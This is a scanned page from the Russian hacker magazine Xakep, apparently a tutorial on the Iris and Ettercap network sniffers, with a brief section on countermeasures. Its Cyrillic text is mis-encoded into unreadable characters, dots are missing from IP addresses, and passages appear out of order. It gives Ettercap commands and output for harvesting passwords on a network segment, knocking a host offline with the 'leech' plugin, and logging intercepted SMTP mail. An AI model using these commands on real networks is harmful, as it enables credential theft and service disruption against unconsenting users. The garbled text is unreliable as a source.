ÛÕÓÚØÙ ÃÂ¥ÃÂÚ - Xakep Online
ÛÕÓÚØÙ ÃÂ¥ÃÂÚ - Xakep Online
ÛÕÓÚØÙ ÃÂ¥ÃÂÚ - Xakep Online
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
ÑÍÈÔÔÅÐÛ<br />
 ÁÎÉ!<br />
Åñëè ñ NetSniffer-îì âñå ïîíÿòíî (ñêðèí 1), òî ñ Iris ñëîæíåå Òàê ÷òî äàâàé<br />
ñ ñàìîãî íà÷àëà À ñíà÷àëà íàäî óêàçàòü, êàêîé äåâàéñ þçàòü (ñêðèí<br />
2) Íåäîëãî äóìàÿ, ÿ íàæàë íà êíîïêó Play aka Start (âûãëÿäèò òàê æå, êàê<br />
è íà âèäàêå), è ïîëèëîñü ðó÷üåì, ñêîêà èíôû-òî, íè÷åãî íå ïîíÿòü Íî<br />
èíîãäà âñå-òàêè ïðîñêàêèâàþò ïîíÿòíûå äàííûå, íàïðèìåð, íà ñêðèíå 4<br />
òû ìîæåøü ïðî÷èòàòü íåñêîëüêî ñëîâ (ÿ çàøåë íà wwwwzornet) Íî ýòî<br />
âñå íå òî, íàì íóæíû ïàðîëè, ïîýòîìó ÿ ïðèêîííåêòèëñÿ ñ äðóãîé òà÷êè ê<br />
ôòï, ââåäÿ ëîãèí è ïàðîëü Îñòàíàâëèâàåì ñíèôôåð è æìåì íà ïèìïó ïîä<br />
íàçâàíèåì «decode buffer packets» (îíà íàõîäèòñÿ ëåâåå «play») Ãëÿíü íà<br />
ñêðèí 5, ýòî òî, ÷òî îòëîâèëà è äåêîäèðîâàëà â íîðìàëüíîå ñîîáùåíèå<br />
ettercap - NdzsCLi eth0<br />
Îïðåäåëÿåì îïåðàöèîííóþ ñèñòåìó õîñòà ñ IP-àäðåñîì 127001:<br />
ettercap - Ndzsfi eth0 127001<br />
Ñìîòðèì óñòàíîâëåííûå ïëàãèíû è îïèñàíèÿ ê íèì:<br />
ettercap - N -p list<br />
Ðàññìîòðèì îäèí èç ïëàãèíîâ - leech, îí èçîëèðóåò óäàëåííûé õîñò îò ñåòè<br />
Ïðîïèíãîâàâ õîñò, âèäèì, ÷òî îí â ñåòè Çàïóñêàåì ïëàãèí:<br />
ettercap -Ndp leech 192168689<br />
Your IP: 192168681 MAC: 00:50:BF:4A:48:F3 Iface: ed0<br />
Starting /ec_leechso plugin<br />
Building host list for netmask 2552552550, please wait<br />
Sending 255 ARP request<br />
Listening for replies<br />
Isolating host 192168689 Press return to stop<br />
Æäåì-ñ ïàðó ñåêîíäç è æìåì ^C, óñå, ñåòåâîé èíòåðôåéñ ïåðåñòàåò ðàáîòàòü<br />
íà íåêîòîðîå âðåìÿ, íî ÎÑ è ïðèëîæåíèÿ ïðîäîëæàþò ðàáîòàòü íîðìàëüíî,<br />
ýòîãî «íåêîòîðîãî âðåìåíè» õâàòàåò íà çàïîëó÷åíèå ip-àäðåñà<br />
æåðòâû Ïèíãóåì äëÿ ïðîâåðêè!<br />
PING 192168689 (192168689): 56 data bytes<br />
—-192168689 ping statistics—-<br />
4 packets transmitted, 0 packet received, 100% packet loss<br />
Äëÿ ïåðåõâàòà íåçàøèôðîâàííûõ ïî÷òîâûõ ñîîáùåíèè áóäåì þçàòü:<br />
/ettercap -Nzds :<br />
<br />
Ïðèìåð - /ettercap -Nzds ANY:25 ANY > /root/sniffsmtp<br />
èðèñêà; ïàðîëè è âñþ èíôó, êîòîðàÿ òåáÿ íå êàñàåòñÿ, ÿ çàêðàñèë =) Òàêæå<br />
îíà ìîæåò âåñòè ëîãè, íî ýòèì óæå íèêîãî íå óäèâèøü À óäèâèòü òåáÿ<br />
ìîæåò ìíîãî äðóãîå â ýòîé ñîôòèíå, íàïðèìåð, òî, ÷òî èðèñêà ìîæåò ðàáîòàòü<br />
ïî ðàñïèñàíèþ, îíà èìååò êó÷ó ôèëüòðîâ, ïîýòîìó òû ìîæåøü êîíêðåòèçèðîâàòü<br />
ñâîþ öåëü Çàìåòü, Iris ìîæåò ðàñêèäûâàòü ïàêåòû íå òîëüêî<br />
ïî çàãîëîâêàì (IP-àäðåñ, ïîðò è òä), íî è ïî ñîäåðæàíèþ íåêîòîðîãî<br />
ñëîâà â îáëàñòè ïàêåòà È åùå îäíîé îñîáåííîñòüþ ÷óäî-èðèñêè ÿâëÿåòñÿ<br />
âîçìîæíîñòü äèíàìè÷åñêîãî íàáëþäåíèÿ çà ñåòüþ Ïî òâîåìó õîòåíèþ<br />
îíà ìîæåò ïîñòðîèòü âñåâîçìîæíûå ãðàôèêè, îñíîâûâàÿñü íà èíôå, ïîñòóïàþùåé<br />
íà ñåòåâóõó Òàê ìîæíî âûÿâèòü àòàêóþùèõ, ìîæíî áûñòðî<br />
ïðîñìîòðåòü äèàãðàììó ñàìûõ àêòèâíûõ êîìïîâ â ñåòè è òä<br />
ÊÎÍÒÐÌÅÐÛ<br />
Áåçóñëîâíî, ëó÷øèé ñïîñîá çàùèòû îò ñíèôôèíãà - ýòî øèôðîâàíèå PGP,<br />
SSH è ðàçëè÷íûå óòèëèòû äëÿ øèôðîâàíèÿ äîëæíû ñòàòü òâîèìè ëó÷øèìè<br />
äðóçüÿìè! Íî åñòü åùå ñïîñîá äëÿ òîãî, ÷òîáû îáíàðóæèòü ñíèôôåð â ñèñòåìå:<br />
íåîáõîäèìî ïðîâåðèòü, íå ðàáîòàåò ëè êàêîå-ëèáî èç ñåòåâûõ óñòðîéñòâ<br />
â ñåòè â íåðàçáîð÷èâîì ðåæèìå Ïîä ëèíóêñ åñòü îäíî ñðåäñòâî -<br />
ifconfig, ýòà òóëçà ñîîáùàåò î ñîñòîÿíèè ñåòåâûõ óñòðîéñòâ<br />
Âîò è âñå! Ôó Åùå õî÷ó äîáàâèòü îäíî ñëîâî! Ñíèôôåðû ïðåäñòàâëÿþò<br />
ñîáîé ñóùåñòâåííóþ óãðîçó áåçîïàñíîñòè â îñíîâíîì èç-çà òðóäíîñòè èõ<br />
À òåïåðü ðåáóò, è áûñòðåå â ëèíóõ èëè ÷òî ó òåáÿ òàì Ñåé÷àñ ìû çàéìåìñÿ íå<br />
ìåíåå ïîïóëÿðíûì ñíèôôàêîì - Ettercap Äëÿ íà÷àëà íåêîòîðûå åãî îïöèè:<br />
-a, -s, -m - ðàçëè÷íûå âèäû ïðîñëóøèâàíèÿ (âûøå ÿ äàâàë ëèíê, òàì è ìîæåøü<br />
ïðî íèõ ïðî÷èòàòü);<br />
-N - çàïóñêàòü ñíèôôåð áåç ïñåâäîãðàôèêè;<br />
-z - çàïóñê â ñïîêîéíîì ðåæèìå;<br />
-d - íå ïðåîáðàçîâûâàòü IP-àäðåñà â èìåíà;<br />
-i - ñåòåâîé èíòåðôåéñ;<br />
-l - âûâåñòè ñïèñîê õîñòîâ â ñåòè;<br />
-C - ñîáèðàòü âñå èìåíà è ïàðîëè ïîëüçîâàòåëåé;<br />
-f - îïðåäåëåíèå îïåðàöèîííîé ñèñòåìû óäàëåííîãî õîñòà;<br />
-p - ðàáîòà ñ ïëàãèíàìè;<br />
-L - çàïèñûâàòü â ëîã, èìåþùèé ôîðìàò: ãîä-ìåñÿö-äåíü-collectedpasslog<br />
Òåïåðü ðàññìîòðèì íåêîòîðûå âèäû èñïîëüçîâàíèÿ ýòîãî ñíèôôåðà Ñíà÷àëà<br />
áóäåì ïåðåõâàòûâàòü âñå ïàðîëè â íàøåì ñåãìåíòå ñåòè è çàïèñûâàòü â ëîã:<br />
îáíàðóæåíèÿ Èçó÷åíèå ñïîñîáîâ ïðèìåíåíèÿ «âûíþõèâàòåëåé» è ïîíèìàíèå<br />
òîãî, êàê îíè ìîãóò áûòü èñïîëüçîâàíû ïðîòèâ òåáÿ, ñóùåñòâåííî<br />
ïîìîæåò òåáå â çàùèòå îò îíûõ Óäà÷è!<br />
A<br />
page 037